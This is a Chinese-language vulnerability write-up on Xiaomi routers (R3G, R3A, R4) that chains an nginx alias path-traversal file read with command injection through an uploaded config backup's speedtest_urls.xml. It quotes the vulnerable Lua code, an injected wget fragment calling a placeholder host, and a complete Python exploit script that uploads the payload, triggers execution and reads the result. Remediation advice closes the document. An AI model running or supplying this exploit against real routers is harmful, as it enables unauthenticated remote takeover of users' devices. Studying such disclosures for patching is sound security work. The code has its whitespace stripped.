Word小米路由器任意文件讀取及遠(yuǎn)程命令執(zhí)行漏洞解析一、漏洞描述

小米路由器是一款高配的（智能）路由器,具備強(qiáng)大的擴(kuò)展,并且具備高速傳輸?shù)奶攸c(diǎn),其傳輸速度最高可以達(dá)到866M,相比普通150M/300M的普通無線路由器具備更高無線傳輸速率。小米路由器系統(tǒng)存在任意文件讀取漏洞和遠(yuǎn)程命令執(zhí)行漏洞，攻擊者通過該漏洞可以獲取服務(wù)器權(quán)限，導(dǎo)致服務(wù)器失陷。

二、漏洞復(fù)現(xiàn)

系統(tǒng)首頁地址及頁面顯示如下

http://xx.xx.xx.xx/cgi-bin/luci/web

調(diào)用的地方貌似有好幾個(gè)，其中/usr/lib/lua/luci/controller/api/xqnetdetect.lua中

functionnetspeed()localXQPreference=require("xiaoqiang.XQPreference")localXQNSTUtil=require("xiaoqiang.module.XQNetworkSpeedTest")localcode=0localresult={}localhistory=LuciHttp.formvalue("history")ifhistorythenresult["bandwidth"]=tonumber(XQPreference.get("BANDWIDTH",0,"xiaoqiang"))result["download"]=tonumber(string.format("%.2f",128*result.bandwidth))result["bandwidth2"]=tonumber(XQPreference.get("BANDWIDTH2",0,"xiaoqiang"))result["upload"]=tonumber(string.format("%.2f",128*result.bandwidth2))elseos.execute("/etc/init.d/miqosstop")--這里調(diào)用了downloadSpeedTestlocaldownload=XQNSTUtil.downloadSpeedTest()ifdownloadthenresult["download"]=downloadresult["bandwidth"]=tonumber(string.format("%.2f",8*download/1024))XQPreference.set("BANDWIDTH",tostring(result.bandwidth),"xiaoqiang")elsecode=1588endifcode~=0thenresult["msg"]=XQErrorUtil.getErrorMessage(code)endos.execute("/etc/init.d/miqosstart")endresult["code"]=codeLuciHttp.write_json(result)endfunctiondownloadSpeedTest()localspeedtest="/usr/bin/download_speedtest"localspeed--直接調(diào)用sh文件for_,lineinipairs(LuciUtil.execl(speedtest))doifnotXQFunction.isStrNil(line)andline:match("^avgrx:")thenspeed=line:match("^avgrx:(%S+)")ifspeedthenspeed=tonumber(string.format("%.2f",speed/8))endbreakendendreturnspeedend/tmp/1.txt;exit;wgethttp://xx.xx.xx.xx"/>

remote_command_execution_vulnerability.py

#!/usr/bin/pythonimportosimporttarfileimportrequestsproxies={"http":":8080"}##getstokstok=input("stok:")##makeconfigfilecommand=input("command:")speed_test_filename="speedtest_urls.xml"withopen("template.xml","rt",encoding='gb18030',errors='ignore')asf:template=f.read()data=template.format(command=command)#print(data)withopen("speedtest_urls.xml",'wt')asf:f.write(data)withtarfile.open("payload.tar.gz","w:gz")astar:#tar.add("cfg_backup.des")#tar.add("cfg_backup.mbu")tar.add("speedtest_urls.xml")##uploadconfigfileprint("startuplo（adi）ngconfigfile...")r1=requests.post("http://xx.xx.xx.xx/cgi-bin/luci/;stok={}/api/misystem/c_upload".format(stok),files={"image":open("payload.tar.gz",'rb')},proxies=proxies)#print(r1.text)##execdownloadspeedtest,execcommandprint("startexeccommand...")r2=requests.get("http://xx.xx.xx.xx/cgi-bin/luci/;stok={}/api/xqnetdetect/netspeed".format(stok),proxies=proxies)#print(r2.text)##readresultfiler3=requests.get("http://xx.xx.xx.xx/api-third-party/download/extdisks../tmp/1.txt",proxies=proxies)ifr3.status_code==200:print("success,vul")print(r3.text)

結(jié)合二者，無需登錄即可遠(yuǎn)程命令執(zhí)行

經(jīng)測(cè)試，在小米系列路由器中存在該漏洞，如小米路由器R3G、小米路由器R3A、小米路由器R4等

三、修復(fù)方案

1、任意文件讀取

將/etc/sysapihttpd/sysapihttpd.conf中的形如以下形式修改為

location/xxx{alias/abc/;}

修改為

location/xxx/{alias/abc/;}

2、遠(yuǎn)程命令執(zhí)行

將備份文件格式修改為特定格式，直接讀取備份文件內(nèi)容，而不需使用解壓

從speedtest_urls.xml中讀取url時(shí)，進(jìn)行必要的過濾，防止命令注入